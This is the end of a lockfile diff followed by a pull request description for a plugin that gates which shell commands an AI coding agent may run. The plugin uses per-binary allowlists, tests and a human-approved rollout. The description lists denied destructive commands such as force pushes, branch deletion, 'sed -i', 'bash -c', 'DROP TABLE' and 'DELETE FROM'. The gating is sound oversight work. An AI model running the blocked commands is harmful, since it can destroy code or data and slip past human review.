+    { url = "https://files.pythonhosted.org/packages/9c/47/9b51216951974df1f263ac19da550d34252e0ed7218c25f10c5ef9ed7517/ruff-0.15.22-py3-none-musllinux_1_2_i686.whl", hash = "sha256:a1606c510bd7215680d32efab38965f7cdec3ef69f5170a3f4791404ffdd5262", size = 11105077, upload-time = "2026-07-16T15:13:57.915Z" },
+    { url = "https://files.pythonhosted.org/packages/c2/47/20e9d4a3b8016778acea5fc32bb50d35d207500a17ddb529ffa6996feef8/ruff-0.15.22-py3-none-musllinux_1_2_x86_64.whl", hash = "sha256:630479b18625f5ffc373f77603a22a9f8ac0acd7ff0501178b5db28ec71e9c64", size = 11490980, upload-time = "2026-07-16T15:14:01.032Z" },
+    { url = "https://files.pythonhosted.org/packages/4d/76/3f72d8fc38c1cb77b38c56a70da9d0c17700cc1cc50f9649c9d3c8f5ba71/ruff-0.15.22-py3-none-win32.whl", hash = "sha256:e5ba0e4a13fd14abbed2a77b517a3911290c6c6c59ef67784328d1668fab76cf", size = 10789165, upload-time = "2026-07-16T15:14:04.16Z" },
+    { url = "https://files.pythonhosted.org/packages/cb/46/4965251734c2b6fcdca1b1b187d20bcac3af0ee5b083b89c910bb961ce3a/ruff-0.15.22-py3-none-win_amd64.whl", hash = "sha256:9be63ba1eb936acd2d1342fb8337c356353706fce233b2a15a09a97037e6acde", size = 11938297, upload-time = "2026-07-16T15:14:07.316Z" },
+    { url = "https://files.pythonhosted.org/packages/57/c9/e69b1ff4c8b69093ef08b8919ab767af0569666865b39c30a8795d88d3c6/ruff-0.15.22-py3-none-win_arm64.whl", hash = "sha256:e1168075b72158510839f250027659cdd78476f40507dd517892304c41318661", size = 11298172, upload-time = "2026-07-16T15:14:10.51Z" },
+]
+
+[[package]]
+name = "typing-extensions"
+version = "4.16.0"
+source = { registry = "https://pypi.org/simple" }
+sdist = { url = "https://files.pythonhosted.org/packages/f6/cc/6253133b5bb138fc3306cebfbda2c520f545d36b5be2c7255cc528bb45d6/typing_extensions-4.16.0.tar.gz", hash = "sha256:dc983d19a509c94dba722ee6abd33940f7c05a89e243c47e907eb4db6f1a43e5", size = 113555, upload-time = "2026-07-02T08:40:05.92Z" }
+wheels = [
+    { url = "https://files.pythonhosted.org/packages/49/d3/b8441a820a491ddfc024b0b0cf0393375b75ea13866d9c66727e54c2fc80/typing_extensions-4.16.0-py3-none-any.whl", hash = "sha256:481caa481374e813c1b176ada14e97f1f67a4539ce9cfeb3f350d78d6370c2e8", size = 45571, upload-time = "2026-07-02T08:40:04.659Z" },
+]


### PR DESCRIPTION
## Context (tier-1 loop-breaker)

`claude-pilot#90` shipped the per-spawn engine with an empty `DEFAULT_POLICY`. cpp is now installed on gentux, but the Phase 1 opt-in flip has **nothing to load** — empty policy denies every spawn. Without this plugin, `MIKA_PERMISSION_POLICY_MODE=per_spawn` hard-denies every Bash tool call, and the 25 ready issues frozen in the mika-dev backlog stay frozen.

**This PR is the last maillon before the flip unblocks the loop.**

## What ships

| Path | Purpose |
|---|---|
| `tools/mika_permission_policy/mika_permission_policy/_binaries.py` | Per-binary safety functions `(argv, cwd) -> bool`. AC3 initial 13 + grep-family + read-only SAFE_SHELL_COMMANDS + no-op safe builtins. Every guard mirrors classic `tier1.py` verbatim. |
| `tools/mika_permission_policy/mika_permission_policy/__init__.py` | `get_policy()` registry — the entry point `claude_pilot.per_spawn.load_policy_from_module()` imports. |
| `tools/mika_permission_policy/tests/` | 169 tests: per-binary allow/deny + registry shape + AC3 completeness. |
| `tools/mika_permission_policy/README.md` | Mode selection, plugin authoring, accepted risks, what `per_spawn` already handles. |
| `tools/mika_permission_policy/pyproject.toml` | Hatchling package. **No runtime deps** — structural typing on the PolicyFn protocol keeps the plugin importable without claude-pilot installed. |
| `Makefile` | `install-permission-policy-plugin` + `test-permission-policy-plugin` targets. |

## Parity contract (correctness for Phase 1 opt-in)

Every safety function here mirrors the equivalent rule in `claude-pilot/src/claude_pilot/tier1.py`. The parity discipline is:

- What tier1 auto-approves on a compound STRING, this plugin auto-approves on the corresponding decomposed `Spawn`.
- What tier1's `TIER3_PATTERNS` denies, this plugin denies at the argv level (`sed -i`, `git push --force`, `git push origin main/master`, `git branch -D`, `cargo publish`, `bash -c`, `sh -c`, `DROP TABLE`, `DELETE FROM`, …).
- What tier1's `_is_safe_find_command`, `_is_safe_sort_command`, `_is_safe_gh_command` guard, this plugin guards with the same closed-world allowlists.

Regression coverage on the `mika#1686` evidence class (n=13+ blocked shapes that tier1 denied on compound strings but per_spawn unblocks): the shape ``grep -n foo file | awk '$1 > 700 && $1 < 2540'`` (the exact `task a055bf57` case from mika#1679) now passes end-to-end — grep and awk each evaluate independently under the plugin.

## Acceptance criteria mapping

| AC | Coverage |
|---|---|
| **AC1** registry returns `dict[str, PolicyFn]` with AC3 13 present | `test_registry.py::TestRegistry` (all 13 asserted) |
| **AC2** cross-test parity vs tier1 | `test_binaries.py::TestXxx::test_allowed` parametrized on tier1's allowed shapes; `test_denied` on `TIER3_PATTERNS` |
| **AC3** regression n=13+ shapes | `test_awk.test_allowed[grep-awk-conditional]`, `test_grep`, `test_find` |
| **AC4** pytest verte | 169 passed |
| **AC5** install path documented + reproducible | `README.md § Install` + `make install-permission-policy-plugin` |
| **AC6** authoring guide | `README.md § Adding a binary` |

## Test results

```
$ make test-permission-policy-plugin
169 passed in 0.09s

$ cd tools/mika_permission_policy && uv run ruff check
All checks passed!

$ cd tools/mika_permission_policy && uv run mypy mika_permission_policy
Success: no issues found in 2 source files
```

## Deploy path — DOUBLE-GATED (Vincent's hands)

1. **Merge** — Vincent (repo scope, per supervision model)
2. **Reinstall on gentux** — Vincent runs:
   ```
   make install-permission-policy-plugin
   ```
   Which expands to:
   ```
   uv tool install --reinstall --force --editable ../claude-pilot \
     --with-editable ./tools/mika_permission_policy
   ```
3. **Flip env vars** — Vincent sets on a canary session (or persistently in `~/.mika/.env`):
   ```
   MIKA_PERMISSION_POLICY_MODE=per_spawn
   MIKA_PERMISSION_POLICY_MODULE=mika_permission_policy:get_policy
   ```

After canary success: monitor `[claude-pilot audit_event] {\"kind\": \"perm_policy_rollback\"}` on stderr; when N=50 dispatches accumulate with zero rollbacks, ratify Phase 2 default flip with Vincent.

## Boundary (SSC OSS discipline)

- **Mika-side (this PR)**: the specific allow/deny CONTENTS. Private to this repo.
- **claude-pilot-side** (`claude-pilot#90`, already merged): the generic engine, empty `DEFAULT_POLICY`, plugin loader protocol.

No dependency coupling between the two: this plugin does NOT import `claude_pilot.per_spawn.PolicyFn` — it declares `PolicyFn = Callable[[list[str], str], bool]` locally so structural typing carries the contract. That means the plugin is testable + installable in environments where claude-pilot is absent (CI without cpp), and any downstream consumer implementing the same protocol can use this plugin verbatim.

## Non-goals

- Modifying `claude-pilot` (public repo, PR#90 fixed and merged)
- Retiring `tier1.py` — Phase 3, post-flip, separate follow-up
- Phase 2 default flip (N=50 monitoring) — post-ship operator action

## References

- Parent milestone: `mika#1708` (architect-ratified Option C spec)
- Class-level design: `mika#1686` (Prime-ratified C)
- Generic engine PR: `senara-solutions/claude-pilot#90` (merged 2026-07-22)
- Plan doc: `docs/plans/2026-07-01-008-feat-1708-per-spawn-permission-gate-plan.md` on branch `feat/1708/permission-policy-cpp-per-spawn`
- Interface source: `claude-pilot/src/claude_pilot/per_spawn.py` (`PolicyFn`, `load_policy_from_module`)
- Plugin docs (cpp side): `claude-pilot/docs/permission-mode.md`

Closes #1817 once merged + installed + canary verified.